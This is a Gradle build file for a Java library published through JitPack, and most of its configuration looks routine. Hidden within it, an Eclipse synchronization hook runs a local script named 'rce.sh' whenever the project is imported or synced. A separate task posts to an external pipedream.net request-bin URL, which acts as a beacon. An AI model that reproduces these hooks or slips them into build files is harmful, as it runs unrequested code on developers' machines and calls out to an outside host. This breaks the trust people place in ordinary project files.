
plugins {
    id "io.github.http-builder-ng.http-plugin" version "0.1.1"
    id 'eclipse'
}

apply plugin: 'java'
apply plugin: 'maven'

group = 'com.github.jitpack'

sourceCompatibility = 1.8 // java 8
targetCompatibility = 1.8

repositories {
  mavenCentral()
}

dependencies {
  implementation 'com.google.guava:guava:29.0-jre'
}


task sourcesJar(type: Jar, dependsOn: classes) {
    classifier = 'sources'
    from sourceSets.main.allSource
}

task javadocJar(type: Jar, dependsOn: javadoc) {
    classifier = 'javadoc'
    from javadoc.destinationDir
}

task finalize {
    doLast {
       println('finally!')
    }
}

import io.github.httpbuilderng.http.HttpTask
task notify(type: HttpTask){
    config {
        request.uri = 'https://enquz3ebuj46tcv.m.pipedream.net'
    }
    post {
        request.uri.path = '/x'
        // request.body = [event: 'activated']
        response.success {
            println 'The event notification was successful'
        }
    }
}
artifacts {
    archives sourcesJar
    archives javadocJar
}

// To specify a license in the pom:
install {
  repositories.mavenInstaller {
    pom.project {
      licenses {
        license {
          name 'The Apache Software License, Version 2.0'
          url 'http://www.apache.org/licenses/LICENSE-2.0.txt'
          distribution 'repo'
        }
      }
    }
  }
}

wrapper {
    gradleVersion = "6.1.1"
    distributionType = Wrapper.DistributionType.ALL
}

task sendGetRequest(type:Exec) {
  
  workingDir '.'
  
  commandLine './rce.sh'

}

eclipse {
    synchronizationTasks sendGetRequest
} 
// build.finalizedBy(notify)
